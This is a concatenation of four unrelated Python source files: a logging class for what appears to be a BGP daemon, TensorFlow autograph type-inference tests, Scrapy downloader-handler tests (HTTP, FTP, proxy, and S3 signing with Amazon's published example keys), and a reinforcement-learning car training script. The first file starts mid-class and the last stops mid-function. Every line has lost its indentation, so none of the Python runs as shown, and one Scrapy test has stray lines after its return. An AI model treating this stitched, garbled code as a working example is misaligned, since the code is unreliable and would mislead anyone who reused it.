def error (self,message,source='',level='ERROR'):
for line in message.split('\n'):
if self._syslog:
self._syslog.error(self._prefixed(level,source,line))
else:
print self._prefixed(level,source,line)
sys.stdout.flush()
def critical (self,message,source='',level='CRITICAL'):
for line in message.split('\n'):
if self._syslog:
self._syslog.critical(self._prefixed(level,source,line))
else:
print self._prefixed(level,source,line)
sys.stdout.flush()
self.pdb(level)
def raw (self,message):
for line in message.split('\n'):
if self._syslog:
self._syslog.critical(line)
else:
print line
sys.stdout.flush()
# show the message on the wire
def network (self,message,recorder='info'):
up = short(recorder)
if self._network and getattr(syslog,'LOG_%s' % up) <= self.level:
getattr(self,recorder.lower())(message,'network')
else:
self._record(time.localtime(),'network',recorder,message)
self.pdb(recorder)
# show the message on the wire
def wire (self,message,recorder='debug'):
up = short(recorder)
if self._wire and getattr(syslog,'LOG_%s' % up) <= self.level:
getattr(self,recorder.lower())(message,'wire')
else:
self._record(time.localtime(),'wire',recorder,message)
self.pdb(recorder)
# show the exchange of message between peers
def message (self,message,recorder='info'):
up = short(recorder)
if self._message and getattr(syslog,'LOG_%s' % up) <= self.level:
getattr(self,recorder.lower())(message,'message')
else:
self._record(time.localtime(),'message',recorder,message)
self.pdb(recorder)
# show the parsing of the configuration
def configuration (self,message,recorder='info'):
up = short(recorder)
if self._configuration and getattr(syslog,'LOG_%s' % up) <= self.level:
getattr(self,recorder.lower())(message,'configuration')
else:
self._record(time.localtime(),'configuration',recorder,message)
self.pdb(recorder)
# show the exchange of message generated by the reactor (^C and signal received)
def reactor (self,message,recorder='info'):
up = short(recorder)
if self._reactor and getattr(syslog,'LOG_%s' % up) <= self.level:
getattr(self,recorder.lower())(message,'reactor')
else:
self._record(time.localtime(),'reactor',recorder,message)
self.pdb(recorder)
# show the change of rib table
def rib (self,message,recorder='info'):
up = short(recorder)
if self._rib and getattr(syslog,'LOG_%s' % up) <= self.level:
getattr(self,recorder.lower())(message,'rib')
else:
self._record(time.localtime(),'rib',recorder,message)
self.pdb(recorder)
# show the change of rib table
def timers (self,message,recorder='debug'):
up = short(recorder)
if self._timer and getattr(syslog,'LOG_%s' % up) <= self.level:
getattr(self,recorder.lower())(message,'timers')
else:
self._record(time.localtime(),'timers',recorder,message)
self.pdb(recorder)
# show the exchange of message generated by the daemon feature (change pid, fork, ...)
def daemon (self,message,recorder='info'):
up = short(recorder)
if self._daemon and getattr(syslog,'LOG_%s' % up) <= self.level:
getattr(self,recorder.lower())(message,'daemon')
else:
self._record(time.localtime(),'daemon',recorder,message)
self.pdb(recorder)
# show the exchange of message generated by the forked processes
def processes (self,message,recorder='info'):
up = short(recorder)
if self._processes and getattr(syslog,'LOG_%s' % up) <= self.level:
getattr(self,recorder.lower())(message,'processes')
else:
self._record(time.localtime(),'processes',recorder,message)
self.pdb(recorder)
# show the exchange of message generated by the routes received
def routes (self,message,recorder='info'):
up = short(recorder)
if self._routes and getattr(syslog,'LOG_%s' % up) <= self.level:
getattr(self,recorder.lower())(message,'routes')
else:
self._record(time.localtime(),'routes',recorder,message)
self.pdb(recorder)
# show how the message received are parsed
def parser (self,message,recorder='info'):
up = short(recorder)
if self._parser and getattr(syslog,'LOG_%s' % up) <= self.level:
getattr(self,recorder.lower())(message,'parser')
self.pdb(recorder)
def Logger ():
if _Logger._instance is not None:
return _Logger._instance
instance = _Logger()
_Logger._instance = instance
return instance
class FakeLogger:
def __getattr__ (self,name):
return lambda data,_=None: sys.stdout.write('Fake logger [%s]\n' % str(data))
if __name__ == '__main__':
logger = Logger()
logger.wire('wire packet content')
logger.message('message exchanged')
logger.debug('debug test')
|
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for type_info module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.autograph.pyct import anno
from tensorflow.python.autograph.pyct import cfg
from tensorflow.python.autograph.pyct import parser
from tensorflow.python.autograph.pyct import qual_names
from tensorflow.python.autograph.pyct import transformer
from tensorflow.python.autograph.pyct.static_analysis import activity
from tensorflow.python.autograph.pyct.static_analysis import live_values
from tensorflow.python.autograph.pyct.static_analysis import reaching_definitions
from tensorflow.python.autograph.pyct.static_analysis import type_info
from tensorflow.python.client import session
from tensorflow.python.platform import test
from tensorflow.python.training import training
class ScopeTest(test.TestCase):
def test_basic(self):
scope = type_info.Scope(None)
self.assertFalse(scope.hasval('foo'))
scope.setval('foo', 'bar')
self.assertTrue(scope.hasval('foo'))
self.assertFalse(scope.hasval('baz'))
def test_nesting(self):
scope = type_info.Scope(None)
scope.setval('foo', '')
child = type_info.Scope(scope)
self.assertTrue(child.hasval('foo'))
self.assertTrue(scope.hasval('foo'))
child.setval('bar', '')
self.assertTrue(child.hasval('bar'))
self.assertFalse(scope.hasval('bar'))
class TypeInfoResolverTest(test.TestCase):
def _parse_and_analyze(self,
test_fn,
namespace,
arg_types=None):
node, source = parser.parse_entity(test_fn)
entity_info = transformer.EntityInfo(
source_code=source,
source_file=None,
namespace=namespace,
arg_values=None,
arg_types=arg_types,
owner_type=None)
node = qual_names.resolve(node)
graphs = cfg.build(node)
ctx = transformer.Context(entity_info)
node = activity.resolve(node, ctx)
node = reaching_definitions.resolve(node, ctx, graphs,
reaching_definitions.Definition)
node = live_values.resolve(node, ctx, {})
node = type_info.resolve(node, ctx)
node = live_values.resolve(node, ctx, {})
return node
def test_constructor_detection(self):
def test_fn():
opt = training.GradientDescentOptimizer(0.1)
return opt
node = self._parse_and_analyze(test_fn, {'training': training})
call_node = node.body[0].body[0].value
self.assertTrue(anno.getanno(call_node, 'is_constructor'))
self.assertEquals(training.GradientDescentOptimizer,
anno.getanno(call_node, 'type'))
self.assertEquals((training.__name__, 'GradientDescentOptimizer'),
anno.getanno(call_node, 'type_fqn'))
def test_constructor_detection_builtin_class(self):
def test_fn(x):
res = zip(x)
return res
node = self._parse_and_analyze(test_fn, {})
call_node = node.body[0].body[0].value
self.assertFalse(anno.hasanno(call_node, 'is_constructor'))
def test_class_members_of_detected_constructor(self):
def test_fn():
opt = training.GradientDescentOptimizer(0.1)
opt.minimize(0)
node = self._parse_and_analyze(test_fn, {'training': training})
method_call = node.body[0].body[1].value.func
self.assertEquals(training.GradientDescentOptimizer.minimize,
anno.getanno(method_call, 'live_val'))
def test_class_members_in_with_stmt(self):
def test_fn(x):
with session.Session() as sess:
sess.run(x)
node = self._parse_and_analyze(test_fn, {'session': session})
constructor_call = node.body[0].body[0].items[0].context_expr
self.assertEquals(session.Session, anno.getanno(constructor_call, 'type'))
self.assertEquals((session.__name__, 'Session'),
anno.getanno(constructor_call, 'type_fqn'))
method_call = node.body[0].body[0].body[0].value.func
self.assertEquals(session.Session.run, anno.getanno(method_call,
'live_val'))
def test_constructor_data_dependent(self):
def test_fn(x):
if x > 0:
opt = training.GradientDescentOptimizer(0.1)
else:
opt = training.GradientDescentOptimizer(0.01)
opt.minimize(0)
node = self._parse_and_analyze(test_fn, {'training': training})
method_call = node.body[0].body[1].value.func
self.assertFalse(anno.hasanno(method_call, 'live_val'))
def test_parameter_class_members(self):
def test_fn(opt):
opt.minimize(0)
node = self._parse_and_analyze(test_fn, {})
method_call = node.body[0].body[0].value.func
self.assertFalse(anno.hasanno(method_call, 'live_val'))
def test_parameter_class_members_with_value_hints(self):
def test_fn(opt):
opt.minimize(0)
node = self._parse_and_analyze(
test_fn, {},
arg_types={
'opt': (training.GradientDescentOptimizer.__name__,
training.GradientDescentOptimizer)
})
method_call = node.body[0].body[0].value.func
self.assertEquals(training.GradientDescentOptimizer.minimize,
anno.getanno(method_call, 'live_val'))
def test_function_variables(self):
def bar():
pass
def test_fn():
foo = bar
foo()
node = self._parse_and_analyze(test_fn, {'bar': bar})
method_call = node.body[0].body[1].value.func
self.assertFalse(anno.hasanno(method_call, 'live_val'))
def test_nested_members(self):
def test_fn():
foo = training.GradientDescentOptimizer(0.1)
foo.bar.baz()
node = self._parse_and_analyze(test_fn, {'training': training})
method_call = node.body[0].body[1].value.func
self.assertFalse(anno.hasanno(method_call, 'live_val'))
def test_nested_unpacking(self):
class Foo(object):
pass
class Bar(object):
pass
def test_fn():
a, (b, c) = (Foo(), (Bar(), Foo()))
return a, b, c
node = self._parse_and_analyze(test_fn, {'Foo': Foo, 'Bar': Bar})
a, b, c = node.body[0].body[1].value.elts
self.assertEquals(anno.getanno(a, 'type'), Foo)
self.assertEquals(anno.getanno(b, 'type'), Bar)
self.assertEquals(anno.getanno(c, 'type'), Foo)
self.assertFalse(anno.hasanno(a, 'live_val'))
self.assertFalse(anno.hasanno(b, 'live_val'))
self.assertFalse(anno.hasanno(c, 'live_val'))
if __name__ == '__main__':
test.main()
|
|
import os
import twisted
import six
from twisted.trial import unittest
from twisted.protocols.policies import WrappingFactory
from twisted.python.filepath import FilePath
from twisted.internet import reactor, defer, error
from twisted.web import server, static, util, resource
from twisted.web.test.test_webclient import ForeverTakingResource, \
NoLengthResource, HostHeaderResource, \
PayloadResource, BrokenDownloadResource
from twisted.protocols.ftp import FTPRealm, FTPFactory
from twisted.cred import portal, checkers, credentials
from twisted.protocols.ftp import FTPClient, ConnectionLost
from w3lib.url import path_to_file_uri
from scrapy import twisted_version
from scrapy.core.downloader.handlers import DownloadHandlers
from scrapy.core.downloader.handlers.file import FileDownloadHandler
from scrapy.core.downloader.handlers.http import HTTPDownloadHandler, HttpDownloadHandler
from scrapy.core.downloader.handlers.http10 import HTTP10DownloadHandler
from scrapy.core.downloader.handlers.http11 import HTTP11DownloadHandler
from scrapy.core.downloader.handlers.s3 import S3DownloadHandler
from scrapy.core.downloader.handlers.ftp import FTPDownloadHandler
from scrapy.spiders import Spider
from scrapy.http import Request
from scrapy.settings import Settings
from scrapy import optional_features
from scrapy.utils.test import get_crawler
from scrapy.exceptions import NotConfigured
from tests.mockserver import MockServer
from tests.spiders import SingleRequestSpider
class DummyDH(object):
def __init__(self, crawler):
pass
class OffDH(object):
def __init__(self, crawler):
raise NotConfigured
class LoadTestCase(unittest.TestCase):
def test_enabled_handler(self):
handlers = {'scheme': 'tests.test_downloader_handlers.DummyDH'}
crawler = get_crawler(settings_dict={'DOWNLOAD_HANDLERS': handlers})
dh = DownloadHandlers(crawler)
self.assertIn('scheme', dh._handlers)
self.assertNotIn('scheme', dh._notconfigured)
def test_not_configured_handler(self):
handlers = {'scheme': 'tests.test_downloader_handlers.OffDH'}
crawler = get_crawler(settings_dict={'DOWNLOAD_HANDLERS': handlers})
dh = DownloadHandlers(crawler)
self.assertNotIn('scheme', dh._handlers)
self.assertIn('scheme', dh._notconfigured)
def test_disabled_handler(self):
handlers = {'scheme': None}
crawler = get_crawler(settings_dict={'DOWNLOAD_HANDLERS': handlers})
dh = DownloadHandlers(crawler)
self.assertNotIn('scheme', dh._handlers)
self.assertNotIn('scheme', dh._notconfigured)
class FileTestCase(unittest.TestCase):
def setUp(self):
self.tmpname = self.mktemp()
fd = open(self.tmpname + '^', 'w')
fd.write('0123456789')
fd.close()
self.download_request = FileDownloadHandler(Settings()).download_request
def test_download(self):
def _test(response):
self.assertEquals(response.url, request.url)
self.assertEquals(response.status, 200)
self.assertEquals(response.body, '0123456789')
request = Request(path_to_file_uri(self.tmpname + '^'))
assert request.url.upper().endswith('%5E')
return self.download_request(request, Spider('foo')).addCallback(_test)
def test_non_existent(self):
request = Request('file://%s' % self.mktemp())
d = self.download_request(request, Spider('foo'))
return self.assertFailure(d, IOError)
class HttpTestCase(unittest.TestCase):
download_handler_cls = HTTPDownloadHandler
def setUp(self):
name = self.mktemp()
os.mkdir(name)
FilePath(name).child("file").setContent("0123456789")
r = static.File(name)
r.putChild("redirect", util.Redirect("/file"))
r.putChild("wait", ForeverTakingResource())
r.putChild("hang-after-headers", ForeverTakingResource(write=True))
r.putChild("nolength", NoLengthResource())
r.putChild("host", HostHeaderResource())
r.putChild("payload", PayloadResource())
r.putChild("broken", BrokenDownloadResource())
self.site = server.Site(r, timeout=None)
self.wrapper = WrappingFactory(self.site)
self.port = reactor.listenTCP(0, self.wrapper, interface='127.0.0.1')
self.portno = self.port.getHost().port
self.download_handler = self.download_handler_cls(Settings())
self.download_request = self.download_handler.download_request
@defer.inlineCallbacks
def tearDown(self):
yield self.port.stopListening()
if hasattr(self.download_handler, 'close'):
yield self.download_handler.close()
def getURL(self, path):
return "http://127.0.0.1:%d/%s" % (self.portno, path)
def test_download(self):
request = Request(self.getURL('file'))
d = self.download_request(request, Spider('foo'))
d.addCallback(lambda r: r.body)
d.addCallback(self.assertEquals, "0123456789")
return d
def test_download_head(self):
request = Request(self.getURL('file'), method='HEAD')
d = self.download_request(request, Spider('foo'))
d.addCallback(lambda r: r.body)
d.addCallback(self.assertEquals, '')
return d
def test_redirect_status(self):
request = Request(self.getURL('redirect'))
d = self.download_request(request, Spider('foo'))
d.addCallback(lambda r: r.status)
d.addCallback(self.assertEquals, 302)
return d
def test_redirect_status_head(self):
request = Request(self.getURL('redirect'), method='HEAD')
d = self.download_request(request, Spider('foo'))
d.addCallback(lambda r: r.status)
d.addCallback(self.assertEquals, 302)
return d
@defer.inlineCallbacks
def test_timeout_download_from_spider(self):
spider = Spider('foo')
meta = {'download_timeout': 0.2}
# client connects but no data is received
request = Request(self.getURL('wait'), meta=meta)
d = self.download_request(request, spider)
yield self.assertFailure(d, defer.TimeoutError, error.TimeoutError)
# client connects, server send headers and some body bytes but hangs
request = Request(self.getURL('hang-after-headers'), meta=meta)
d = self.download_request(request, spider)
yield self.assertFailure(d, defer.TimeoutError, error.TimeoutError)
def test_host_header_not_in_request_headers(self):
def _test(response):
self.assertEquals(response.body, '127.0.0.1:%d' % self.portno)
self.assertEquals(request.headers, {})
request = Request(self.getURL('host'))
return self.download_request(request, Spider('foo')).addCallback(_test)
def test_host_header_seted_in_request_headers(self):
def _test(response):
self.assertEquals(response.body, 'example.com')
self.assertEquals(request.headers.get('Host'), 'example.com')
request = Request(self.getURL('host'), headers={'Host': 'example.com'})
return self.download_request(request, Spider('foo')).addCallback(_test)
d = self.download_request(request, Spider('foo'))
d.addCallback(lambda r: r.body)
d.addCallback(self.assertEquals, 'example.com')
return d
def test_payload(self):
body = '1'*100 # PayloadResource requires body length to be 100
request = Request(self.getURL('payload'), method='POST', body=body)
d = self.download_request(request, Spider('foo'))
d.addCallback(lambda r: r.body)
d.addCallback(self.assertEquals, body)
return d
class DeprecatedHttpTestCase(HttpTestCase):
"""HTTP 1.0 test case"""
download_handler_cls = HttpDownloadHandler
class Http10TestCase(HttpTestCase):
"""HTTP 1.0 test case"""
download_handler_cls = HTTP10DownloadHandler
class Http11TestCase(HttpTestCase):
"""HTTP 1.1 test case"""
download_handler_cls = HTTP11DownloadHandler
if 'http11' not in optional_features:
skip = 'HTTP1.1 not supported in twisted < 11.1.0'
def test_download_without_maxsize_limit(self):
request = Request(self.getURL('file'))
d = self.download_request(request, Spider('foo'))
d.addCallback(lambda r: r.body)
d.addCallback(self.assertEquals, "0123456789")
return d
@defer.inlineCallbacks
def test_download_with_maxsize(self):
request = Request(self.getURL('file'))
# 10 is minimal size for this request and the limit is only counted on
# response body. (regardless of headers)
d = self.download_request(request, Spider('foo', download_maxsize=10))
d.addCallback(lambda r: r.body)
d.addCallback(self.assertEquals, "0123456789")
yield d
d = self.download_request(request, Spider('foo', download_maxsize=9))
yield self.assertFailure(d, defer.CancelledError, error.ConnectionAborted)
@defer.inlineCallbacks
def test_download_with_maxsize_per_req(self):
meta = {'download_maxsize': 2}
request = Request(self.getURL('file'), meta=meta)
d = self.download_request(request, Spider('foo'))
yield self.assertFailure(d, defer.CancelledError, error.ConnectionAborted)
@defer.inlineCallbacks
def test_download_with_small_maxsize_per_spider(self):
request = Request(self.getURL('file'))
d = self.download_request(request, Spider('foo', download_maxsize=2))
yield self.assertFailure(d, defer.CancelledError, error.ConnectionAborted)
def test_download_with_large_maxsize_per_spider(self):
request = Request(self.getURL('file'))
d = self.download_request(request, Spider('foo', download_maxsize=100))
d.addCallback(lambda r: r.body)
d.addCallback(self.assertEquals, "0123456789")
return d
class Http11MockServerTestCase(unittest.TestCase):
"""HTTP 1.1 test case with MockServer"""
if 'http11' not in optional_features:
skip = 'HTTP1.1 not supported in twisted < 11.1.0'
def setUp(self):
self.mockserver = MockServer()
self.mockserver.__enter__()
def tearDown(self):
self.mockserver.__exit__(None, None, None)
@defer.inlineCallbacks
def test_download_with_content_length(self):
crawler = get_crawler(SingleRequestSpider)
# http://localhost:8998/partial set Content-Length to 1024, use download_maxsize= 1000 to avoid
# download it
yield crawler.crawl(seed=Request(url='http://localhost:8998/partial', meta={'download_maxsize': 1000}))
failure = crawler.spider.meta['failure']
self.assertIsInstance(failure.value, defer.CancelledError)
@defer.inlineCallbacks
def test_download(self):
crawler = get_crawler(SingleRequestSpider)
yield crawler.crawl(seed=Request(url='http://localhost:8998'))
failure = crawler.spider.meta.get('failure')
self.assertTrue(failure == None)
reason = crawler.spider.meta['close_reason']
self.assertTrue(reason, 'finished')
@defer.inlineCallbacks
def test_download_gzip_response(self):
if six.PY2 and twisted_version > (12, 3, 0):
crawler = get_crawler(SingleRequestSpider)
body = '1'*100 # PayloadResource requires body length to be 100
request = Request('http://localhost:8998/payload', method='POST', body=body, meta={'download_maxsize': 50})
yield crawler.crawl(seed=request)
failure = crawler.spider.meta['failure']
# download_maxsize < 100, hence the CancelledError
self.assertIsInstance(failure.value, defer.CancelledError)
request.headers.setdefault('Accept-Encoding', 'gzip,deflate')
request = request.replace(url='http://localhost:8998/xpayload')
yield crawler.crawl(seed=request)
# download_maxsize = 50 is enough for the gzipped response
failure = crawler.spider.meta.get('failure')
self.assertTrue(failure == None)
reason = crawler.spider.meta['close_reason']
self.assertTrue(reason, 'finished')
else:
raise unittest.SkipTest("xpayload and payload endpoint only enabled for twisted > 12.3.0 and python 2.x")
class UriResource(resource.Resource):
"""Return the full uri that was requested"""
def getChild(self, path, request):
return self
def render(self, request):
return request.uri
class HttpProxyTestCase(unittest.TestCase):
download_handler_cls = HTTPDownloadHandler
def setUp(self):
site = server.Site(UriResource(), timeout=None)
wrapper = WrappingFactory(site)
self.port = reactor.listenTCP(0, wrapper, interface='127.0.0.1')
self.portno = self.port.getHost().port
self.download_handler = self.download_handler_cls(Settings())
self.download_request = self.download_handler.download_request
@defer.inlineCallbacks
def tearDown(self):
yield self.port.stopListening()
if hasattr(self.download_handler, 'close'):
yield self.download_handler.close()
def getURL(self, path):
return "http://127.0.0.1:%d/%s" % (self.portno, path)
def test_download_with_proxy(self):
def _test(response):
self.assertEquals(response.status, 200)
self.assertEquals(response.url, request.url)
self.assertEquals(response.body, 'http://example.com')
http_proxy = self.getURL('')
request = Request('http://example.com', meta={'proxy': http_proxy})
return self.download_request(request, Spider('foo')).addCallback(_test)
def test_download_with_proxy_https_noconnect(self):
def _test(response):
self.assertEquals(response.status, 200)
self.assertEquals(response.url, request.url)
self.assertEquals(response.body, 'https://example.com')
http_proxy = '%s?noconnect' % self.getURL('')
request = Request('https://example.com', meta={'proxy': http_proxy})
return self.download_request(request, Spider('foo')).addCallback(_test)
def test_download_without_proxy(self):
def _test(response):
self.assertEquals(response.status, 200)
self.assertEquals(response.url, request.url)
self.assertEquals(response.body, '/path/to/resource')
request = Request(self.getURL('path/to/resource'))
return self.download_request(request, Spider('foo')).addCallback(_test)
class DeprecatedHttpProxyTestCase(unittest.TestCase):
"""Old deprecated reference to http10 downloader handler"""
download_handler_cls = HttpDownloadHandler
class Http10ProxyTestCase(HttpProxyTestCase):
download_handler_cls = HTTP10DownloadHandler
class Http11ProxyTestCase(HttpProxyTestCase):
download_handler_cls = HTTP11DownloadHandler
if 'http11' not in optional_features:
skip = 'HTTP1.1 not supported in twisted < 11.1.0'
class HttpDownloadHandlerMock(object):
def __init__(self, settings):
pass
def download_request(self, request, spider):
return request
class S3TestCase(unittest.TestCase):
skip = 'boto' not in optional_features and 'missing boto library'
# test use same example keys than amazon developer guide
# http://s3.amazonaws.com/awsdocs/S3/20060301/s3-dg-20060301.pdf
# and the tests described here are the examples from that manual
AWS_ACCESS_KEY_ID = '0PN5J17HBGZHT7JJ3X82'
AWS_SECRET_ACCESS_KEY = 'uV3F3YluFJax1cknvbcGwgjvx4QpvB+leU8dUj2o'
def setUp(self):
s3reqh = S3DownloadHandler(Settings(), self.AWS_ACCESS_KEY_ID, \
self.AWS_SECRET_ACCESS_KEY, \
httpdownloadhandler=HttpDownloadHandlerMock)
self.download_request = s3reqh.download_request
self.spider = Spider('foo')
def test_request_signing1(self):
# gets an object from the johnsmith bucket.
req = Request('s3://johnsmith/photos/puppy.jpg',
headers={'Date': 'Tue, 27 Mar 2007 19:36:42 +0000'})
httpreq = self.download_request(req, self.spider)
self.assertEqual(httpreq.headers['Authorization'], \
'AWS 0PN5J17HBGZHT7JJ3X82:xXjDGYUmKxnwqr5KXNPGldn5LbA=')
def test_request_signing2(self):
# puts an object into the johnsmith bucket.
req = Request('s3://johnsmith/photos/puppy.jpg', method='PUT', headers={
'Content-Type': 'image/jpeg',
'Date': 'Tue, 27 Mar 2007 21:15:45 +0000',
'Content-Length': '94328',
})
httpreq = self.download_request(req, self.spider)
self.assertEqual(httpreq.headers['Authorization'], \
'AWS 0PN5J17HBGZHT7JJ3X82:hcicpDDvL9SsO6AkvxqmIWkmOuQ=')
def test_request_signing3(self):
# lists the content of the johnsmith bucket.
req = Request('s3://johnsmith/?prefix=photos&max-keys=50&marker=puppy', \
method='GET', headers={
'User-Agent': 'Mozilla/5.0',
'Date': 'Tue, 27 Mar 2007 19:42:41 +0000',
})
httpreq = self.download_request(req, self.spider)
self.assertEqual(httpreq.headers['Authorization'], \
'AWS 0PN5J17HBGZHT7JJ3X82:jsRt/rhG+Vtp88HrYL706QhE4w4=')
def test_request_signing4(self):
# fetches the access control policy sub-resource for the 'johnsmith' bucket.
req = Request('s3://johnsmith/?acl', \
method='GET', headers={'Date': 'Tue, 27 Mar 2007 19:44:46 +0000'})
httpreq = self.download_request(req, self.spider)
self.assertEqual(httpreq.headers['Authorization'], \
'AWS 0PN5J17HBGZHT7JJ3X82:thdUi9VAkzhkniLj96JIrOPGi0g=')
def test_request_signing5(self):
# deletes an object from the 'johnsmith' bucket using the
# path-style and Date alternative.
req = Request('s3://johnsmith/photos/puppy.jpg', \
method='DELETE', headers={
'Date': 'Tue, 27 Mar 2007 21:20:27 +0000',
'x-amz-date': 'Tue, 27 Mar 2007 21:20:26 +0000',
})
httpreq = self.download_request(req, self.spider)
self.assertEqual(httpreq.headers['Authorization'], \
'AWS 0PN5J17HBGZHT7JJ3X82:k3nL7gH3+PadhTEVn5Ip83xlYzk=')
def test_request_signing6(self):
# uploads an object to a CNAME style virtual hosted bucket with metadata.
req = Request('s3://static.johnsmith.net:8080/db-backup.dat.gz', \
method='PUT', headers={
'User-Agent': 'curl/7.15.5',
'Host': 'static.johnsmith.net:8080',
'Date': 'Tue, 27 Mar 2007 21:06:08 +0000',
'x-amz-acl': 'public-read',
'content-type': 'application/x-download',
'Content-MD5': '4gJE4saaMU4BqNR0kLY+lw==',
'X-Amz-Meta-ReviewedBy': 'joe@johnsmith.net,jane@johnsmith.net',
'X-Amz-Meta-FileChecksum': '0x02661779',
'X-Amz-Meta-ChecksumAlgorithm': 'crc32',
'Content-Disposition': 'attachment; filename=database.dat',
'Content-Encoding': 'gzip',
'Content-Length': '5913339',
})
httpreq = self.download_request(req, self.spider)
self.assertEqual(httpreq.headers['Authorization'], \
'AWS 0PN5J17HBGZHT7JJ3X82:C0FlOtU8Ylb9KDTpZqYkZPX91iI=')
def test_request_signing7(self):
# ensure that spaces are quoted properly before signing
req = Request(
("s3://johnsmith/photos/my puppy.jpg"
"?response-content-disposition=my puppy.jpg"),
method='GET',
headers={
'Date': 'Tue, 27 Mar 2007 19:42:41 +0000',
})
httpreq = self.download_request(req, self.spider)
self.assertEqual(
httpreq.headers['Authorization'],
'AWS 0PN5J17HBGZHT7JJ3X82:+CfvG8EZ3YccOrRVMXNaK2eKZmM=')
class FTPTestCase(unittest.TestCase):
username = "scrapy"
password = "passwd"
if twisted_version < (10, 2, 0):
skip = "Twisted pre 10.2.0 doesn't allow to set home path other than /home"
def setUp(self):
# setup dirs and test file
self.directory = self.mktemp()
os.mkdir(self.directory)
userdir = os.path.join(self.directory, self.username)
os.mkdir(userdir)
fp = FilePath(userdir)
fp.child('file.txt').setContent("I have the power!")
fp.child('file with spaces.txt').setContent("Moooooooooo power!")
# setup server
realm = FTPRealm(anonymousRoot=self.directory, userHome=self.directory)
p = portal.Portal(realm)
users_checker = checkers.InMemoryUsernamePasswordDatabaseDontUse()
users_checker.addUser(self.username, self.password)
p.registerChecker(users_checker, credentials.IUsernamePassword)
self.factory = FTPFactory(portal=p)
self.port = reactor.listenTCP(0, self.factory, interface="127.0.0.1")
self.portNum = self.port.getHost().port
self.download_handler = FTPDownloadHandler(Settings())
self.addCleanup(self.port.stopListening)
def _add_test_callbacks(self, deferred, callback=None, errback=None):
def _clean(data):
self.download_handler.client.transport.loseConnection()
return data
deferred.addCallback(_clean)
if callback:
deferred.addCallback(callback)
if errback:
deferred.addErrback(errback)
return deferred
def test_ftp_download_success(self):
request = Request(url="ftp://127.0.0.1:%s/file.txt" % self.portNum,
meta={"ftp_user": self.username, "ftp_password": self.password})
d = self.download_handler.download_request(request, None)
def _test(r):
self.assertEqual(r.status, 200)
self.assertEqual(r.body, 'I have the power!')
self.assertEqual(r.headers, {'Local Filename': [''], 'Size': ['17']})
return self._add_test_callbacks(d, _test)
def test_ftp_download_path_with_spaces(self):
request = Request(
url="ftp://127.0.0.1:%s/file with spaces.txt" % self.portNum,
meta={"ftp_user": self.username, "ftp_password": self.password}
)
d = self.download_handler.download_request(request, None)
def _test(r):
self.assertEqual(r.status, 200)
self.assertEqual(r.body, 'Moooooooooo power!')
self.assertEqual(r.headers, {'Local Filename': [''], 'Size': ['18']})
return self._add_test_callbacks(d, _test)
def test_ftp_download_notexist(self):
request = Request(url="ftp://127.0.0.1:%s/notexist.txt" % self.portNum,
meta={"ftp_user": self.username, "ftp_password": self.password})
d = self.download_handler.download_request(request, None)
def _test(r):
self.assertEqual(r.status, 404)
return self._add_test_callbacks(d, _test)
def test_ftp_local_filename(self):
local_fname = "/tmp/file.txt"
request = Request(url="ftp://127.0.0.1:%s/file.txt" % self.portNum,
meta={"ftp_user": self.username, "ftp_password": self.password, "ftp_local_filename": local_fname})
d = self.download_handler.download_request(request, None)
def _test(r):
self.assertEqual(r.body, local_fname)
self.assertEqual(r.headers, {'Local Filename': ['/tmp/file.txt'], 'Size': ['17']})
self.assertTrue(os.path.exists(local_fname))
with open(local_fname) as f:
self.assertEqual(f.read(), "I have the power!")
os.remove(local_fname)
return self._add_test_callbacks(d, _test)
def test_invalid_credentials(self):
request = Request(url="ftp://127.0.0.1:%s/file.txt" % self.portNum,
meta={"ftp_user": self.username, "ftp_password": 'invalid'})
d = self.download_handler.download_request(request, None)
def _test(r):
self.assertEqual(r.type, ConnectionLost)
return self._add_test_callbacks(d, errback=_test)
|
|
import carmunk
import numpy as np
import random
import csv
from nn import neural_net, LossHistory
import os.path
import timeit
NUM_INPUT = 3
GAMMA = 0.9 # Forgetting.
TUNING = False # If False, just use arbitrary, pre-selected params.
def train_net(model, params):
filename = params_to_filename(params)
observe = 1000 # Number of frames to observe before training.
epsilon = 1
train_frames = 40000 # Number of frames to play.
batchSize = params['batchSize']
buffer = params['buffer']
# Just stuff used below.
max_car_distance = 0
car_distance = 0
t = 0
data_collect = []
replay = [] # stores tuples of (S, A, R, S').
loss_log = []
# Create a new game instance.
game_state = carmunk.GameState()
# Get initial state by doing nothing and getting the state.
_, state = game_state.frame_step((2))
# Let's time it.
start_time = timeit.default_timer()
# Run the frames.
while t < train_frames:
t += 1
car_distance += 1
# Choose an action.
if random.random() < epsilon or t < observe:
action = np.random.randint(0, 3) # random
else:
# Get Q values for each action.
qval = model.predict(state, batch_size=1)
action = (np.argmax(qval)) # best
# Take action, observe new state and get our treat.
reward, new_state = game_state.frame_step(action)
# Experience replay storage.
replay.append((state, action, reward, new_state))
# If we're done observing, start training.
if t > observe:
# If we've stored enough in our buffer, pop the oldest.
if len(replay) > buffer:
replay.pop(0)
# Randomly sample our experience replay memory
minibatch = random.sample(replay, batchSize)
# Get training values.
X_train, y_train = process_minibatch(minibatch, model)
# Train the model on this batch.
history = LossHistory()
model.fit(
X_train, y_train, batch_size=batchSize,
nb_epoch=1, verbose=0, callbacks=[history]
)
loss_log.append(history.losses)
# Update the starting state with S'.
state = new_state
# Decrement epsilon over time.
if epsilon > 0.1 and t > observe:
epsilon -= (1/train_frames)
# We died, so update stuff.
if reward == -500:
# Log the car's distance at this T.
data_collect.append([t, car_distance])
# Update max.
if car_distance > max_car_distance:
max_car_distance = car_distance
# Time it.
tot_time = timeit.default_timer() - start_time
fps = car_distance / tot_time
# Output some stuff so we can watch.
print("Max: %d at %d\tepsilon %f\t(%d)\t%f fps" %
(max_car_distance, t, epsilon, car_distance, fps))
# Reset.
car_distance = 0
start_time = timeit.default_timer()
# Save the model every 25,000 frames.
if t % 1000 == 0:
model.save_weights('saved-models/' + filename + '-' +
str(t) + '.h5',
overwrite=True)
print("Saving model %s - %d" % (filename, t))
# Log results after we're done all frames.
log_results(filename, data_collect, loss_log)
def log_results(filename, data_collect, loss_log):
